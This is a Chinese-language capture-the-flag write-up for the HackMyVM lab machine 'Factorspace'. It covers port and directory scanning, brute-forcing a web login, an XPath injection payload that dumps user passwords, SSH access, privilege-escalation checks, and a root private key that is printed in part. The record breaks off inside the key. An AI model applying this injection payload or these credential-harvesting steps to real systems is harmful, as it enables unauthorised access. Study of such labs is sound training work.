[HackMyVM]靶场Factorspace

kali:192.168.56.104

靶机:192.168.56.138

端口扫描

复制代码
┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.138
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-29 22:38 CST
Nmap scan report for 192.168.56.138
Host is up (0.000081s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:DD:D8:ED (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

22 80 两个端口

浅扫一下目录

复制代码
# gobuster dir -u http://192.168.56.138   -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.138
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php,bak,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.56.138/images/]
/login.php            (Status: 200) [Size: 2346]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 19579]
/icon                 (Status: 301) [Size: 315] [--> http://192.168.56.138/icon/]
/results.php          (Status: 302) [Size: 115] [--> login.php]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.138/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.138/js/]
/check.php            (Status: 302) [Size: 0] [--> login.php]
/auth.php             (Status: 200) [Size: 0]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.138/fonts/]
/parent               (Status: 301) [Size: 317] [--> http://192.168.56.138/parent/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1323360 / 1323366 (100.00%)
===============================================================
Finished
===============================================================

有login ,result,check,auth应该是登录相关的php

去web看一下

平平无奇,源码也没有什么值得注意的地方

直接去那几个php看试了一下其他几个都会跳转到login.php,那么只能从这里下手

登录界面还有验证码

随便输入抓个包看一下

post的内容发到了auth.php,有三个参数username,password,captcha

获取到验证码的是这个url

复制代码
http://192.168.56.138/auth.php?generate_captcha=1

现在只能爆破密码了,盲猜用户名是admin

应该是一个会话内的验证码不变,防不了爆破

密码爆出来是iloveyou

登录之后是一个名字搜索框

测试了一下存在sql注入,但是为什么自己闭合会失效

在搜索引擎上搜了一下结果发现这是XPATH注入

然后在CSDN上搜到一个关于讲解XPATH注入的博客

浅谈Xpath注入漏洞-CSDN博客

里面给了这样一个payload

复制代码
']|//*|//*['

就是']把前面的['闭合, 后面的['闭合后面的'],然后//*是列出文档中的所有元素

复制代码
$query="user/username[@name='']|//*|//*['';

通过这个payload爆出这三个人的密码

测试发现只有qyxG27KGkW0x9SJ1能登录jackie的ssh

复制代码
┌──(root㉿kali2)-[~/Desktop]
└─# ssh jackie@192.168.56.138
jackie@192.168.56.138's password: 
Linux factorspace 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jackie@factorspace:~$ whoami
jackie

在jackie用户也是拿到了 user flag

复制代码
jackie@factorspace:~$ ls -al
total 32
drwxr-xr-x 4 jackie jackie 4096 May  8  2023 .
drwxr-xr-x 3 root   root   4096 Apr  6  2023 ..
lrwxrwxrwx 1 root   root      9 Apr  6  2023 .bash_history -> /dev/null
-rw-r--r-- 1 jackie jackie  220 Apr 14  2023 .bash_logout
-rw-r--r-- 1 jackie jackie 3526 Apr 14  2023 .bashrc
drwxr-xr-x 3 jackie jackie 4096 Apr 14  2023 .local
-rw-r--r-- 1 jackie jackie  809 Apr 14  2023 .profile
drwx------ 2 jackie jackie 4096 Apr 14  2023 .ssh
-rwx------ 1 jackie jackie   33 Apr 14  2023 user.txt
jackie@factorspace:~$ cat user*
eb7d964a2a41006bb325cf822db664be

home下只有jackie一个用户,那就围绕它来提权

复制代码
jackie@factorspace:/home$ ls -al
total 12
drwxr-xr-x  3 root   root   4096 Apr  6  2023 .
drwxr-xr-x 18 root   root   4096 Feb  6  2023 ..
drwxr-xr-x  4 jackie jackie 4096 May  8  2023 jackie

sudo -l看一下

复制代码
jackie@factorspace:~$ sudo -l
-bash: sudo: command not found

无果

看一下html文件有没有什么东西

复制代码
jackie@factorspace:/var/www/html$ ls -al
total 76
drwxr-xr-x 8 root root  4096 May  8  2023 .
drwxr-xr-x 3 root root  4096 Apr  9  2023 ..
-rw-r--r-- 1 root root  2009 Apr 14  2023 auth.php
-rw-r--r-- 1 root root   214 Apr 14  2023 check.php
drwxr-xr-x 2 root root  4096 Apr 14  2023 css
-rw-r--r-- 1 root root   544 Apr 14  2023 employee_info_2023.xml
-rw-r--r-- 1 root root  1373 Apr 14  2023 employee_search_filter.html
drwxr-xr-x 2 root root  4096 Apr 14  2023 fonts
drwxr-xr-x 2 root root  4096 Apr 14  2023 icon
drwxr-xr-x 2 root root  4096 Apr 14  2023 images
-rw-r--r-- 1 root root 19579 Apr 14  2023 index.html
drwxr-xr-x 2 root root  4096 Apr 14  2023 industrial-html
drwxr-xr-x 3 root root  4096 Apr 14  2023 js
-rw-r--r-- 1 root root  2346 Apr 14  2023 login.php
-rw-r--r-- 1 root root   634 Apr 14  2023 results.php

无果

看定时任务

复制代码
jackie@factorspace:/$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

无果

suid看一下

复制代码
jackie@factorspace:/$ find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/mount
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount

无果

看一下内核版本

复制代码
jackie@factorspace:/$ uname -a
Linux factorspace 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64 GNU/Linux

挺新的,应该不是利用它

pspy64看一下进程

复制代码
jackie@factorspace:~$ wget http://192.168.56.104:6677/pspy64
--2024-03-30 03:40:21--  http://192.168.56.104:6677/pspy64
Connecting to 192.168.56.104:6677... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: 'pspy64'

pspy64                          100%[=====================================================>]   2.94M  --.-KB/s    in 0.03s   

2024-03-30 03:40:21 (93.5 MB/s) - 'pspy64' saved [3078592/3078592]

jackie@factorspace:~$ chmod +x pspy64
jackie@factorspace:~$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2024/03/30 03:40:31 CMD: UID=1000 PID=987    | -bash 
2024/03/30 03:40:31 CMD: UID=1000 PID=986    | sshd: jackie@pts/0   
2024/03/30 03:40:31 CMD: UID=1000 PID=977    | (sd-pam) 
2024/03/30 03:40:31 CMD: UID=1000 PID=976    | /lib/systemd/systemd --user 
2024/03/30 03:40:31 CMD: UID=0    PID=973    | sshd: jackie [priv]  
2024/03/30 03:40:31 CMD: UID=0    PID=920    | 
2024/03/30 03:40:31 CMD: UID=0    PID=9      | 
2024/03/30 03:40:31 CMD: UID=0    PID=850    | 
2024/03/30 03:40:31 CMD: UID=33   PID=804    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=0    PID=8      | 
2024/03/30 03:40:31 CMD: UID=0    PID=67     | 
2024/03/30 03:40:31 CMD: UID=0    PID=66     | 
2024/03/30 03:40:31 CMD: UID=0    PID=63     | 
2024/03/30 03:40:31 CMD: UID=0    PID=6      | 
2024/03/30 03:40:31 CMD: UID=33   PID=538    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=33   PID=534    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=33   PID=533    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=33   PID=532    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=33   PID=531    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=33   PID=530    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=0    PID=53     | 
2024/03/30 03:40:31 CMD: UID=33   PID=529    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=0    PID=52     | 
2024/03/30 03:40:31 CMD: UID=0    PID=51     | 
2024/03/30 03:40:31 CMD: UID=0    PID=50     | 
2024/03/30 03:40:31 CMD: UID=0    PID=48     | 
2024/03/30 03:40:31 CMD: UID=0    PID=47     | 
2024/03/30 03:40:31 CMD: UID=0    PID=466    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=0    PID=461    | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups 
2024/03/30 03:40:31 CMD: UID=0    PID=46     | 
2024/03/30 03:40:31 CMD: UID=0    PID=45     | 
2024/03/30 03:40:31 CMD: UID=0    PID=447    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2024/03/30 03:40:31 CMD: UID=0    PID=44     | 
2024/03/30 03:40:31 CMD: UID=0    PID=43     | 
2024/03/30 03:40:31 CMD: UID=0    PID=402    | /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant 
2024/03/30 03:40:31 CMD: UID=0    PID=4      | 
2024/03/30 03:40:31 CMD: UID=0    PID=395    | /lib/systemd/systemd-logind 
2024/03/30 03:40:31 CMD: UID=0    PID=390    | /usr/sbin/rsyslogd -n -iNONE 
2024/03/30 03:40:31 CMD: UID=103  PID=376    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only                                                                                                     
2024/03/30 03:40:31 CMD: UID=0    PID=375    | /usr/sbin/cron -f 
2024/03/30 03:40:31 CMD: UID=0    PID=344    | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                                                            
2024/03/30 03:40:31 CMD: UID=0    PID=341    | 
2024/03/30 03:40:31 CMD: UID=104  PID=340    | /lib/systemd/systemd-timesyncd 
2024/03/30 03:40:31 CMD: UID=0    PID=338    | 
2024/03/30 03:40:31 CMD: UID=0    PID=337    | 
2024/03/30 03:40:31 CMD: UID=0    PID=336    | 
2024/03/30 03:40:31 CMD: UID=0    PID=334    | 
2024/03/30 03:40:31 CMD: UID=0    PID=331    | 
2024/03/30 03:40:31 CMD: UID=0    PID=329    | 
2024/03/30 03:40:31 CMD: UID=0    PID=326    | 
2024/03/30 03:40:31 CMD: UID=0    PID=322    | 
2024/03/30 03:40:31 CMD: UID=0    PID=316    | 
2024/03/30 03:40:31 CMD: UID=0    PID=3      | 
2024/03/30 03:40:31 CMD: UID=0    PID=250    | 
2024/03/30 03:40:31 CMD: UID=0    PID=25     | 
2024/03/30 03:40:31 CMD: UID=0    PID=24     | 
2024/03/30 03:40:31 CMD: UID=0    PID=23     | 
2024/03/30 03:40:31 CMD: UID=0    PID=22     | 
2024/03/30 03:40:31 CMD: UID=0    PID=21     | 
2024/03/30 03:40:31 CMD: UID=0    PID=205    | /lib/systemd/systemd-udevd 
2024/03/30 03:40:31 CMD: UID=0    PID=20     | 
2024/03/30 03:40:31 CMD: UID=0    PID=2      | 
2024/03/30 03:40:31 CMD: UID=0    PID=19     | 
2024/03/30 03:40:31 CMD: UID=0    PID=185    | /lib/systemd/systemd-journald 
2024/03/30 03:40:31 CMD: UID=0    PID=18     | 
2024/03/30 03:40:31 CMD: UID=0    PID=17     | 
2024/03/30 03:40:31 CMD: UID=0    PID=15     | 
2024/03/30 03:40:31 CMD: UID=0    PID=149    | 
2024/03/30 03:40:31 CMD: UID=0    PID=148    | 
2024/03/30 03:40:31 CMD: UID=0    PID=13     | 
2024/03/30 03:40:31 CMD: UID=1000 PID=1208   | ./pspy64 
2024/03/30 03:40:31 CMD: UID=0    PID=1207   | 
2024/03/30 03:40:31 CMD: UID=0    PID=1205   | /bin/sleep 10 
2024/03/30 03:40:31 CMD: UID=0    PID=12     | 
2024/03/30 03:40:31 CMD: UID=0    PID=112    | 
2024/03/30 03:40:31 CMD: UID=0    PID=1106   | 
2024/03/30 03:40:31 CMD: UID=0    PID=110    | 
2024/03/30 03:40:31 CMD: UID=0    PID=11     | 
2024/03/30 03:40:31 CMD: UID=0    PID=109    | 
2024/03/30 03:40:31 CMD: UID=0    PID=108    | 
2024/03/30 03:40:31 CMD: UID=0    PID=107    | 
2024/03/30 03:40:31 CMD: UID=0    PID=106    | 
2024/03/30 03:40:31 CMD: UID=0    PID=1055   | 
2024/03/30 03:40:31 CMD: UID=0    PID=105    | 
2024/03/30 03:40:31 CMD: UID=0    PID=104    | 
2024/03/30 03:40:31 CMD: UID=0    PID=10     | 
2024/03/30 03:40:31 CMD: UID=0    PID=1      | /sbin/init 
2024/03/30 03:40:31 CMD: UID=0    PID=1216   | /sbin/init 
2024/03/30 03:40:32 CMD: UID=0    PID=1217   | (sleep) 
2024/03/30 03:40:40 CMD: UID=0    PID=1218   | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                                                            
2024/03/30 03:40:40 CMD: UID=0    PID=1219   | /bin/sh /sbin/dhclient-script 
2024/03/30 03:40:40 CMD: UID=0    PID=1220   | /bin/sh /sbin/dhclient-script 
2024/03/30 03:40:40 CMD: UID=0    PID=1221   | /bin/sh /sbin/dhclient-script 
2024/03/30 03:40:40 CMD: UID=0    PID=1222   | /bin/sh /sbin/dhclient-script 
2024/03/30 03:40:42 CMD: UID=0    PID=1223   | /sbin/init 
2024/03/30 03:40:42 CMD: UID=0    PID=1224   | /sbin/init 
2024/03/30 03:40:52 CMD: UID=0    PID=1225   | /sbin/init 
2024/03/30 03:40:52 CMD: UID=0    PID=1226   | /sbin/init 
2024/03/30 03:41:02 CMD: UID=0    PID=1227   | /sbin/init 
2024/03/30 03:41:02 CMD: UID=0    PID=1228   | /sbin/init 
2024/03/30 03:41:12 CMD: UID=0    PID=1229   | /sbin/init 
2024/03/30 03:41:13 CMD: UID=0    PID=1230   | /sbin/init 

无果

上linpeas看一下

依然无果

ps auxww看一下

复制代码
jackie@factorspace:~/.ssh$  ps auxww
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.1  1.0 163708 10048 ?        Ss   03:04   0:05 /sbin/init
root           2  0.0  0.0      0     0 ?        S    03:04   0:00 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<   03:04   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<   03:04   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<   03:04   0:00 [kworker/0:0H-events_highpri]
root           8  0.0  0.0      0     0 ?        I<   03:04   0:00 [mm_percpu_wq]
root           9  0.0  0.0      0     0 ?        S    03:04   0:00 [rcu_tasks_rude_]
root          10  0.0  0.0      0     0 ?        S    03:04   0:00 [rcu_tasks_trace]
root          11  0.3  0.0      0     0 ?        S    03:04   0:12 [ksoftirqd/0]
root          12  0.1  0.0      0     0 ?        I    03:04   0:04 [rcu_sched]
root          13  0.0  0.0      0     0 ?        S    03:04   0:00 [migration/0]
root          15  0.0  0.0      0     0 ?        S    03:04   0:00 [cpuhp/0]
root          17  0.0  0.0      0     0 ?        S    03:04   0:00 [kdevtmpfs]
root          18  0.0  0.0      0     0 ?        I<   03:04   0:00 [netns]
root          19  0.0  0.0      0     0 ?        S    03:04   0:00 [kauditd]
root          20  0.0  0.0      0     0 ?        S    03:04   0:00 [khungtaskd]
root          21  0.0  0.0      0     0 ?        S    03:04   0:00 [oom_reaper]
root          22  0.0  0.0      0     0 ?        I<   03:04   0:00 [writeback]
root          23  0.0  0.0      0     0 ?        S    03:04   0:00 [kcompactd0]
root          24  0.0  0.0      0     0 ?        SN   03:04   0:00 [ksmd]
root          25  0.0  0.0      0     0 ?        SN   03:04   0:00 [khugepaged]
root          43  0.0  0.0      0     0 ?        I<   03:04   0:00 [kintegrityd]
root          44  0.0  0.0      0     0 ?        I<   03:04   0:00 [kblockd]
root          45  0.0  0.0      0     0 ?        I<   03:04   0:00 [blkcg_punt_bio]
root          46  0.0  0.0      0     0 ?        I<   03:04   0:00 [edac-poller]
root          47  0.0  0.0      0     0 ?        I<   03:04   0:00 [devfreq_wq]
root          48  0.0  0.0      0     0 ?        I<   03:04   0:01 [kworker/0:1H-kblockd]
root          50  0.0  0.0      0     0 ?        S    03:04   0:00 [kswapd0]
root          51  0.0  0.0      0     0 ?        I<   03:04   0:00 [kthrotld]
root          52  0.0  0.0      0     0 ?        I<   03:04   0:00 [acpi_thermal_pm]
root          53  0.0  0.0      0     0 ?        I<   03:04   0:00 [ipv6_addrconf]
root          63  0.0  0.0      0     0 ?        I<   03:04   0:00 [kstrp]
root          66  0.0  0.0      0     0 ?        I<   03:04   0:00 [zswap-shrink]
root          67  0.0  0.0      0     0 ?        I<   03:04   0:00 [kworker/u3:0]
root         105  0.0  0.0      0     0 ?        I<   03:04   0:00 [ata_sff]
root         106  0.0  0.0      0     0 ?        S    03:04   0:00 [scsi_eh_0]
root         107  0.0  0.0      0     0 ?        I<   03:04   0:00 [scsi_tmf_0]
root         108  0.0  0.0      0     0 ?        S    03:04   0:00 [scsi_eh_1]
root         109  0.0  0.0      0     0 ?        I<   03:04   0:00 [scsi_tmf_1]
root         110  0.0  0.0      0     0 ?        S    03:04   0:00 [scsi_eh_2]
root         112  0.0  0.0      0     0 ?        I<   03:04   0:00 [scsi_tmf_2]
root         148  0.0  0.0      0     0 ?        S    03:04   0:00 [jbd2/sda1-8]
root         149  0.0  0.0      0     0 ?        I<   03:04   0:00 [ext4-rsv-conver]
root         185  0.0  1.7  48412 17656 ?        Ss   03:04   0:01 /lib/systemd/systemd-journald
root         205  0.0  0.5  21592  5156 ?        Ss   03:04   0:00 /lib/systemd/systemd-udevd
root         250  0.0  0.0      0     0 ?        I<   03:04   0:00 [cryptd]
root         316  0.0  0.0      0     0 ?        S    03:04   0:00 [irq/18-vmwgfx]
root         322  0.0  0.0      0     0 ?        I<   03:04   0:00 [ttm_swap]
root         326  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc0]
root         329  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc1]
root         331  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc2]
root         334  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc3]
root         336  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc4]
root         337  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc5]
root         338  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc6]
systemd+     340  0.0  0.6  88440  6004 ?        Ssl  03:04   0:00 /lib/systemd/systemd-timesyncd
root         341  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc7]
root         344  0.0  0.5  99888  5740 ?        Ssl  03:04   0:00 /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
root         375  0.0  0.2   6748  2656 ?        Ss   03:04   0:00 /usr/sbin/cron -f
message+     376  0.0  0.4   8256  4656 ?        Ss   03:04   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root         390  0.0  0.4 220800  4032 ?        Ssl  03:04   0:00 /usr/sbin/rsyslogd -n -iNONE
root         395  0.0  0.7  22056  7184 ?        Ss   03:04   0:00 /lib/systemd/systemd-logind
root         402  0.0  0.5  14620  5152 ?        Ss   03:04   0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
root         447  0.0  0.1   5848  1708 tty1     Ss+  03:04   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root         461  0.0  0.7  13356  7720 ?        Ss   03:04   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root         466  0.0  2.3 208608 23084 ?        Ss   03:04   0:00 /usr/sbin/apache2 -k start
www-data     529  0.8  1.8 209260 18452 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     530  0.8  1.7 209260 17460 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     531  0.8  1.7 209260 17460 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     532  0.8  1.8 209260 18532 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     533  0.8  1.7 209260 17460 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     534  0.8  1.7 209260 17456 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     538  0.8  1.7 209260 17460 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     804  0.6  1.7 209260 17460 ?        S    03:19   0:15 /usr/sbin/apache2 -k start
root         850  0.0  0.0      0     0 ?        I    03:22   0:00 [kworker/u2:2-flush-8:0]
root         920  0.0  0.0      0     0 ?        I    03:27   0:00 [kworker/u2:1-events_unbound]
root         973  0.0  0.9  14716  9068 ?        Ss   03:31   0:00 sshd: jackie [priv]
jackie       976  0.0  0.7  15184  7756 ?        Ss   03:31   0:00 /lib/systemd/systemd --user
jackie       977  0.0  0.2 166664  2580 ?        S    03:31   0:00 (sd-pam)
jackie       986  0.0  0.5  14716  5880 ?        S    03:31   0:00 sshd: jackie@pts/0
jackie       987  0.0  0.5   8512  5136 pts/0    Ss   03:31   0:00 -bash
root        1207  0.1  0.0      0     0 ?        I    03:40   0:02 [kworker/0:0-events]
root       12269  0.0  0.0      0     0 ?        I    03:56   0:00 [kworker/0:1-ata_sff]
root       12270  0.0  0.0      0     0 ?        I    03:56   0:00 [kworker/u2:0-flush-8:0]
root       12344  0.0  0.0      0     0 ?        I    04:01   0:00 [kworker/0:2-ata_sff]
root       12350  0.0  0.0   5368   500 ?        Ss   04:01   0:00 /bin/sleep 10
jackie     12351  0.0  0.3   9760  3244 pts/0    R+   04:01   0:00 ps auxww

也是没有东西

看一下端口情况

复制代码
jackie@factorspace:~$ ss -tulnp
Netid       State        Recv-Q       Send-Q             Local Address:Port             Peer Address:Port       Process       
udp         UNCONN       0            0                        0.0.0.0:68                    0.0.0.0:*                        
tcp         LISTEN       0            128                      0.0.0.0:22                    0.0.0.0:*                        
tcp         LISTEN       0            511                            *:80                          *:*                        
tcp         LISTEN       0            128                         [::]:22                       [::]:*   

擦,汗流浃背了,啥也没有

无奈之下去看了一手wp,发现他们在ss -tulnp有个特殊的udp,为什么我没有,靶机重启了一下还是没有,我淦

可能是我靶机和kali的网卡不一样

不管了,后面就是通过wireshark抓192.168.56.138的udp包,报文里面有个私钥,用私钥登录root就能拿到root权限

复制代码
┌──(root㉿kali2)-[~/Desktop]
└─# cat id        
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAt7C5Q3oTUF0g/0E0ml7PSWDmXh9aQDI6ph2oH1JmYXooVk0ACYBk
nqhM/GBDGmPibjbF7caE+Hgj9FhaE8eCgDznlBXtPouIqaWsN3RHkKZT0qV62G2CRpEHD0
KFY9H4OnkhuHIDIWhioVvbz1kKVG1w/Ys/KPIcLeTzYpsPyeOD9U62IcOuZ5V4Zk7scjnU
jv9uu22JoY9/qg6fIaB63IwJE097udtYc3WCR1RwMP3ePST7MKLm7ZcYyRsGm8iyMhuoDq
IrCLHdMouMDiJaB1jse9SAOZwjyIBQb/NBReydO8RK0JWw6UvGiIH8jlpnpjt6LSKeYKCy
JciSQeBtl7JgI/xO1e/wO5tygA991PD3G1u0/POeXgHsYNbSLq1IgzloS99J8lanEdTALR
KY/ZWnYDN6zvW6MGR+5MgX1gFGeKMqv01ho/RYeKG6QvSk5di0o27jdvbsWVE6nZeaYO4V
t3obvpgZsynzoRb5vWJl3q/Zy/ymzlnPYYSD3wgNAAAFiJQFmimUBZopAAAAB3NzaC1yc2
EAAAGBALewuUN6E1BdIP9BNJpez0lg5l4fWkAyOqYdqB9SZmF6KFZNAAmAZJ6oTPxgQxpj
4m42xe3GhPh4I/RYWhPHgoA855QV7T6LiKmlrDd0R5CmU9KlethtgkaRBw9ChWPR+Dp5Ib
hyAyFoYqFb289ZClRtcP2LPyjyHC3k82KbD8njg/VOtiHDrmeVeGZO7HI51I7/brttiaGP
f6oOnyGgetyMCRNPe7nbWHN1gkdUcDD93j0k+zCi5u2XGMkbBpvIsjIbqA6iKwix3TKLjA
4iWgdY7HvUgDmcI8iAUG/zQUXsnTvEStCVsOlLxoiB/I5aZ6Y7ei0inmCgsiXIkkHgbZey
YCP8TtXv8DubcoAPfdTw9xtbtPzznl4B7GDW0i6tSIM5aEvfSfJWpxHUwC0SmP2Vp2Azes
71ujBkfuTIF9YBRnijKr9NYaP0WHihukL0pOXYtKNu43b27FlROp2XmmDuFbd6G76YGbMp
86EW+b1iZd6v2cv8ps5Zz2GEg98IDQAAAAMBAAEAAAGAB64H0N5luFJscr+TJ3EXUYYPm5
fL+isfcJqE0OptBV5KGXGWss7/ZfK7ZUHRDGVorhr0I4DNRmYferPG8FTDDAF/3R0dkiPb
TtxyWs8tvsp1brUkcbACZljh5q1tTkMVEbzGwCNkJh1rIjvo8L5URDtfIfqUZW3Z58FOu6
yn+FTey37C9p5ryEDji8N49z2buW7MfmGSA4MwXzfFR26iNF5Wcsw77AVTqWAcVkcdea7j
f8LwDZSB+yT6EE5k9FZrqqrokMJ3sarLFbSreicFaZdprCVdq0v7bqW8/nL11rcP1aJYig
frWvV2Ws9c6PRDdrxDPvK6O2syv0jTnwe3MZZfY/quuH5QefzNZJ6b/hcU2DOjDhE17nQQ
78dI7pcKyg/3eZwjmqTgSuvbSzcJhx+6EkC8tB4EG+VLBSQvGxUzQsDKQ5WPajnc8wk95a
45mLZwacsXUep8CqCy+oIuzFhZmOpXJKc5YYKKIaXluJ9/Cawr6SWGGPPe8yve0G6xAAAA
wQCrWWMwu/elmBWoru6oLs4HBgDemGwuQIwoJrloWqNv6NKflOfl4H9MFtL3upMZhWVvxh
5X13gyb0kFUYDl0hMOn+u6jSyCaiHBVY0T4koViJ3HRZE7Txgz4YNKew5fduad7u18FFjr
7ZzuEx5l4tTPZ0/pDLQUdborkLGDAe/sVTczBBGQpLx1ibNqm4lD3xAl+1BuEGTm7o9yoE
79wKsBQsfbJWE4XNR+LJOoRbE5U6D01bQ7eJCWIwRfOB6MqOoAAADBAOXAhvv9mQSyKL8Q
DCW585HXY90Dd9ShP6XgGJ93+HjNCREn0fECRuaVfdTNf1ZpDqBLedXyMglY9sEQGPddSE
/ZKfhYvZl77fhC3+DgAjIUC3o0ENZYBmz5pEcXN/mzRps0vuRC4CexOkz4R5y/rHv3+37u
bG3VgvaqM7TcpQ/ytJQ6gzSZZoRMvHIlfXguTloL0wJiuvhFHhPjftw68vMqC4iXPeV+59
WDxS84DetVPnB6eeCkj7nNwbH/WYH9owAAAMEAzK0LzTiFq5Fi7tV0zmM1cbEQslcHlciO
rknr7mI308Qm+XMo3IsQDFo5ukWFCX3UEkvAgfueOCCpmLU2aHjY62SEzmNok867me4eoo
